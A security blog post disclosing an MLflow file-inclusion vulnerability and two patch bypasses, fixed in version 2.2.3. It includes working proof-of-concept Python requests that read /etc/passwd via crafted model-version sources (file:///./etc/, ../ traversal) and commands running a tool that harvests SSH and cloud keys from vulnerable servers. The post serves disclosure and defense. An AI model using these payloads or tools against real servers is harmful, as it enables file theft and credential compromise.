- 2 patch bypasses found for severe MLflow LFI/RFI vulnerability
- All patched in MLflow version 2.2.3
- Protect AI’s vulnerability scanning and exploit tools updated with bypasses
Recap
Researchers here at Protect AI previously found a system-takeover vulnerability, a Local and Remote File Inclusion (LFI/RFI) flaw, in the popular machine learning tool MLflow, which sees 13 million downloads a month. It allows an attacker to remotely read the SSH keys of engineers on the server, potentially cloud credentials, and all of the ML models and data stored on that server or on adjacent servers that share SSH authentication keys. The community maintainers responded quickly and patched the vulnerability within days. After we highlighted how vulnerable that specific area of the codebase was, other curious minds began looking there as well.
Shining a Spotlight on AI Security
As AI becomes more integrated into our daily lives, its security becomes more important. At the time of the original vulnerability post, there were 867 publicly accessible MLflow servers. Today that number is past 1,000, an increase of 25% in only a couple of months!
In line with our goal of securing the AI lifecycle, we created a public bug bounty program for open source AI tools, hosted on huntr.dev. On March 27th, user @iamnoooob reported a bypass of the original patch. Then, 23 days later, a second bypass was privately submitted to the MLflow community maintainers.
March 23rd, 2023 - Original vulnerability
The original vulnerability, reported by Protect AI, went public: MLflow allowed a user to specify a local or remote path as the source of a model version and use it to read arbitrary files. An attacker could payload the model version's source parameter with a local or remote file path, then call get-artifact on that model version and specify a file inside the payloaded path. Setting source to file:///etc/ and then requesting an artifact named passwd would dump the local or remote server's /etc/passwd file. The MLflow team patched it in this commit.
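As a rough sketch of that flow (an illustration, not a turnkey exploit), assuming the standard MLflow REST endpoints for registering a model and creating a model version, a placeholder server address, and a placeholder model name and version number:

import requests

BASE = "http://1.2.3.4:5000"  # placeholder MLflow tracking server

# Register a model to attach a malicious version to.
requests.post(f"{BASE}/api/2.0/mlflow/registered-models/create", json={"name": "poc-model"})

# Create a model version whose source points at an arbitrary local path.
requests.post(f"{BASE}/api/2.0/mlflow/model-versions/create",
              json={"name": "poc-model", "source": "file:///etc/"})

# Request an "artifact" relative to that source; on an unpatched server this
# returns the contents of /etc/passwd.
resp = requests.get(f"{BASE}/model-versions/get-artifact",
                    params={"path": "passwd", "name": "poc-model", "version": "1"})
print(resp.text)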
March 27th, 2023 - Patch Bypass #1
Huntr.dev user @iamnoooob found that while the patch prevented setting the model version source to a filepath like /etc, it didn't prevent filepaths like /./etc. Filesystems and command shells interpret a single period as a reference to the current directory, so /./etc resolves to the same location as /etc. MLflow's check looked for filepaths starting with /, the root directory, to identify paths pointing at arbitrary local folders; it was not expecting to see a dot. The local filepath check was therefore bypassed, and the following / was still interpreted as the root directory, giving access to the entire filesystem.
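A minimal illustration of why the extra dot matters; this only demonstrates the path resolution, not MLflow's internal check:

import posixpath

# "/./etc" resolves to the same directory as "/etc" once the path is
# normalized, even though the two strings differ.
print(posixpath.normpath("/./etc"))  # -> /etc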
Bypass:
This allows the user to make a GET request and download an arbitrary file from the server with a payloaded path parameter, for example: GET /model-versions/get-artifact?path=passwd&name=mlflow2.2.2&version=2
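Sketching the full bypass flow with the same assumptions and placeholders as the earlier example, the only change from the original exploit is the source value:

import requests

BASE = "http://1.2.3.4:5000"  # placeholder MLflow tracking server

# Identical flow to the original exploit, but the leading "/." slips past the
# patched check while still resolving to the filesystem root.
requests.post(f"{BASE}/api/2.0/mlflow/registered-models/create", json={"name": "poc-model"})
requests.post(f"{BASE}/api/2.0/mlflow/model-versions/create",
              json={"name": "poc-model", "source": "file:///./etc/"})
resp = requests.get(f"{BASE}/model-versions/get-artifact",
                    params={"path": "passwd", "name": "poc-model", "version": "1"})
print(resp.text)  # contents of /etc/passwd on a server without the follow-up fix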
The MLflow team again quickly responded to the report and patched the issue.
April 20th, 2023 - Patch Bypass #2
Recently, another bypass was found by GitHub user @pakesson-truesec and reported privately to the MLflow maintainers on GitHub. This time we'll take a different approach to identifying the vulnerability: analyzing the patch, which can be seen below.
Based on the patch, remote artifact stores are vulnerable to LFI payloads appended to the end of the path in model version source API calls, such as ../../../../<target_folder>. The previous vulnerabilities attacked both the local MLflow server filesystem and the remote file servers MLflow connected to for storing artifacts. This bypass targets only the remote file server, allowing the attacker to read arbitrary files from the remote artifact store.
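As a rough sketch of the payload shape described above (an illustration of the reported pattern, not a verified exploit; the bucket name, target folder, and target file are placeholders, and the remote store could be any artifact backend MLflow supports):

import requests

BASE = "http://1.2.3.4:5000"  # placeholder MLflow tracking server

requests.post(f"{BASE}/api/2.0/mlflow/registered-models/create", json={"name": "poc-remote"})

# The source points at the remote artifact store with a traversal sequence
# appended, so get-artifact escapes the intended prefix on that store.
requests.post(f"{BASE}/api/2.0/mlflow/model-versions/create",
              json={"name": "poc-remote",
                    "source": "s3://some-bucket/artifacts/../../../../<target_folder>"})

resp = requests.get(f"{BASE}/model-versions/get-artifact",
                    params={"path": "<target_file>", "name": "poc-remote", "version": "1"})
print(resp.text)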
Lessons on Secure Coding
We confirmed that version 2.2.3 protects against these publicly known exploits. An example response from version 2.2.3 rejecting the first bypass can be seen below.
The AI industry is still in its nascent phase, which means much of the fundamental code AI runs on is maintained by small numbers of volunteers. Writing secure code is difficult, and we commend maintainer communities, such as the MLflow team, that prioritize their users' safety with prompt responses and fixes when security issues arise. We are leading the way in finding these security issues and reporting them before they are discovered by malicious actors.
Security Toolsuite
We have updated our suite of MLflow security tools that take advantage of these vulnerabilities, including a remote scanner to determine whether an MLflow server is vulnerable.
https://github.com/protectai/Snaike-MLflow
Check if an MLflow server is vulnerable:
git clone https://github.com/protectai/Snaike-MLflow
cd Snaike-MLflow/CVE-2023-1177-scanner
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt
python CVE-2023-1177-scanner.py -s http://1.2.3.4:5000
Find SSH and cloud account keys in vulnerable MLflow servers:
git clone https://github.com/protectai/Snaike-MLflow
cd Snaike-MLflow/MLFIflow
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt
python MLFIflow.py -s http://1.2.3.4:5000
Conclusion
The MLflow maintainers are excellent at addressing security issues and have fixed them all promptly. The original exploit and both bypasses are patched in the current version of MLflow, 2.3.0. When dealing with open source security, we recommend that all developers build their applications with a zero-trust framework in mind: users should start with minimal privileges and be explicitly granted only the privileges they require, with special care given to the processing of user input. The continued safety of open source tools does not depend on developers alone, however. Organizations and users of open source tools should also share responsibility for the continued safety of these useful, free products by contributing code and testing to the projects. If you would like to participate in our goal of securing the AI industry, visit huntr.dev and get paid to help improve the security of AI libraries and tools.